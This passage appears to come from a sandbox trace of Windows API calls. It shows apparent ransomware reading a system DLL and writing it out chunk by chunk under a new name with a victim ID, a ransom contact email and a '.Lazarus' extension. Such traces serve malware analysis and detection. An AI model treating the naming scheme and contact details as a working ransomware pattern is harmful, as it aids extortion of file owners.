(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.922] AreFileApisANSI () returned 1 [0094.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0094.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0094.922] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8)) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0094.922] AreFileApisANSI () returned 1 [0094.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0094.923] GetLastError () returned 0x0 [0094.923] SetLastError (dwErrCode=0x0) [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0094.923] GetLastError () returned 0x0 [0094.923] SetLastError (dwErrCode=0x0) [0094.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0094.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0094.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.923] AreFileApisANSI () returned 1 [0094.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 134 [0094.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10c) returned 0x8c288 [0094.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8c288, cchWideChar=134 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 134 [0094.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.924] GetFileType (hFile=0x418) returned 0x1 [0094.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0094.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0094.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0094.924] AreFileApisANSI () returned 1 [0094.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0094.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0094.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll") returned 72 [0094.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0094.924] GetFileType (hFile=0x33c) returned 0x1 [0094.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.925] GetLastError () returned 0x0 [0094.925] SetLastError (dwErrCode=0x0) [0094.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.925] GetLastError () returned 0x0 [0094.925] SetLastError (dwErrCode=0x0) [0094.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0094.925] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0095.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0095.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0095.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0095.117] GetLastError () returned 0x0 [0095.117] SetLastError (dwErrCode=0x0) [0095.117] GetLastError () returned 0x0 [0095.117] SetLastError (dwErrCode=0x0) [0095.118] GetLastError () returned 0x0 [0095.118] SetLastError (dwErrCode=0x0) [0095.118] GetLastError () returned 0x0 [0095.118] SetLastError (dwErrCode=0x0) [0095.118] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.118] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.120] GetLastError () returned 0x0 [0095.121] SetLastError (dwErrCode=0x0) [0095.121] GetLastError () returned 0x0 [0095.121] SetLastError (dwErrCode=0x0) [0095.121] GetLastError () returned 0x0 [0095.121] SetLastError (dwErrCode=0x0) [0095.121] GetLastError () returned 0x0 [0095.121] SetLastError (dwErrCode=0x0) [0095.121] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.121] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.121] GetLastError () returned 0x0 [0095.121] SetLastError (dwErrCode=0x0) [0095.122] GetLastError () returned 0x0 [0095.122] SetLastError (dwErrCode=0x0) [0095.122] GetLastError () returned 0x0 [0095.122] SetLastError (dwErrCode=0x0) [0095.122] GetLastError () returned 0x0 [0095.122] SetLastError (dwErrCode=0x0) [0095.122] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.122] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.122] GetLastError () returned 0x0 [0095.122] SetLastError (dwErrCode=0x0) [0095.122] GetLastError () returned 0x0 [0095.122] SetLastError (dwErrCode=0x0) [0095.123] GetLastError () returned 0x0 [0095.123] SetLastError (dwErrCode=0x0) [0095.123] GetLastError () returned 0x0 [0095.123] SetLastError (dwErrCode=0x0) [0095.123] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.123] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.123] GetLastError () returned 0x0 [0095.123] SetLastError (dwErrCode=0x0) [0095.123] GetLastError () returned 0x0 [0095.123] SetLastError (dwErrCode=0x0) [0095.123] GetLastError () returned 0x0 [0095.123] SetLastError (dwErrCode=0x0) [0095.123] GetLastError () returned 0x0 [0095.124] SetLastError (dwErrCode=0x0) [0095.124] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.124] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.124] GetLastError () returned 0x0 [0095.124] SetLastError (dwErrCode=0x0) [0095.124] GetLastError () returned 0x0 [0095.124] SetLastError (dwErrCode=0x0) [0095.124] GetLastError () returned 0x0 [0095.124] SetLastError (dwErrCode=0x0) [0095.124] GetLastError () returned 0x0 [0095.124] SetLastError (dwErrCode=0x0) [0095.125] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.125] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.125] GetLastError () returned 0x0 [0095.125] SetLastError (dwErrCode=0x0) [0095.125] GetLastError () returned 0x0 [0095.125] SetLastError (dwErrCode=0x0) [0095.125] GetLastError () returned 0x0 [0095.125] SetLastError (dwErrCode=0x0) [0095.125] GetLastError () returned 0x0 [0095.125] SetLastError (dwErrCode=0x0) [0095.125] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.126] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.126] GetLastError () returned 0x0 [0095.126] SetLastError (dwErrCode=0x0) [0095.126] GetLastError () returned 0x0 [0095.126] SetLastError (dwErrCode=0x0) [0095.126] GetLastError () returned 0x0 [0095.126] SetLastError (dwErrCode=0x0) [0095.126] GetLastError () returned 0x0 [0095.126] SetLastError (dwErrCode=0x0) [0095.126] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.126] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.127] GetLastError () returned 0x0 [0095.127] SetLastError (dwErrCode=0x0) [0095.127] GetLastError () returned 0x0 [0095.127] SetLastError (dwErrCode=0x0) [0095.127] GetLastError () returned 0x0 [0095.127] SetLastError (dwErrCode=0x0) [0095.127] GetLastError () returned 0x0 [0095.127] SetLastError (dwErrCode=0x0) [0095.127] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.127] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.127] GetLastError () returned 0x0 [0095.127] SetLastError (dwErrCode=0x0) [0095.128] GetLastError () returned 0x0 [0095.128] SetLastError (dwErrCode=0x0) [0095.128] GetLastError () returned 0x0 [0095.128] SetLastError (dwErrCode=0x0) [0095.128] GetLastError () returned 0x0 [0095.128] SetLastError (dwErrCode=0x0) [0095.128] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.128] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.128] GetLastError () returned 0x0 [0095.128] SetLastError (dwErrCode=0x0) [0095.128] GetLastError () returned 0x0 [0095.128] SetLastError (dwErrCode=0x0) [0095.129] GetLastError () returned 0x0 [0095.129] SetLastError (dwErrCode=0x0) [0095.129] GetLastError () returned 0x0 [0095.129] SetLastError (dwErrCode=0x0) [0095.129] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.129] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.129] GetLastError () returned 0x0 [0095.129] SetLastError (dwErrCode=0x0) [0095.129] GetLastError () returned 0x0 [0095.129] SetLastError (dwErrCode=0x0) [0095.129] GetLastError () returned 0x0 [0095.129] SetLastError (dwErrCode=0x0) [0095.130] GetLastError () returned 0x0 [0095.130] SetLastError (dwErrCode=0x0) [0095.130] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.130] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.130] GetLastError () returned 0x0 [0095.130] SetLastError (dwErrCode=0x0) [0095.130] GetLastError () returned 0x0 [0095.130] SetLastError (dwErrCode=0x0) [0095.130] GetLastError () returned 0x0 [0095.130] SetLastError (dwErrCode=0x0) [0095.130] GetLastError () returned 0x0 [0095.130] SetLastError (dwErrCode=0x0) [0095.130] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.131] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.131] GetLastError () returned 0x0 [0095.131] SetLastError (dwErrCode=0x0) [0095.131] GetLastError () returned 0x0 [0095.131] SetLastError (dwErrCode=0x0) [0095.131] GetLastError () returned 0x0 [0095.131] SetLastError (dwErrCode=0x0) [0095.131] GetLastError () returned 0x0 [0095.131] SetLastError (dwErrCode=0x0) [0095.131] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.133] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.134] GetLastError () returned 0x0 [0095.134] SetLastError (dwErrCode=0x0) [0095.134] GetLastError () returned 0x0 [0095.134] SetLastError (dwErrCode=0x0) [0095.134] GetLastError () returned 0x0 [0095.134] SetLastError (dwErrCode=0x0) [0095.134] GetLastError () returned 0x0 [0095.134] SetLastError (dwErrCode=0x0) [0095.134] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.135] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.135] GetLastError () returned 0x0 [0095.135] SetLastError (dwErrCode=0x0) [0095.135] GetLastError () returned 0x0 [0095.135] SetLastError (dwErrCode=0x0) [0095.135] GetLastError () returned 0x0 [0095.135] SetLastError (dwErrCode=0x0) [0095.135] GetLastError () returned 0x0 [0095.135] SetLastError (dwErrCode=0x0) [0095.135] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.135] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.136] GetLastError () returned 0x0 [0095.136] SetLastError (dwErrCode=0x0) [0095.136] GetLastError () returned 0x0 [0095.136] SetLastError (dwErrCode=0x0) [0095.136] GetLastError () returned 0x0 [0095.136] SetLastError (dwErrCode=0x0) [0095.136] GetLastError () returned 0x0 [0095.136] SetLastError (dwErrCode=0x0) [0095.136] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.136] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.137] GetLastError () returned 0x0 [0095.137] SetLastError (dwErrCode=0x0) [0095.137] GetLastError () returned 0x0 [0095.137] SetLastError (dwErrCode=0x0) [0095.137] GetLastError () returned 0x0 [0095.137] SetLastError (dwErrCode=0x0) [0095.137] GetLastError () returned 0x0 [0095.137] SetLastError (dwErrCode=0x0) [0095.137] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.137] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.138] GetLastError () returned 0x0 [0095.138] SetLastError (dwErrCode=0x0) [0095.138] GetLastError () returned 0x0 [0095.138] SetLastError (dwErrCode=0x0) [0095.138] GetLastError () returned 0x0 [0095.138] SetLastError (dwErrCode=0x0) [0095.138] GetLastError () returned 0x0 [0095.138] SetLastError (dwErrCode=0x0) [0095.138] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.138] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, 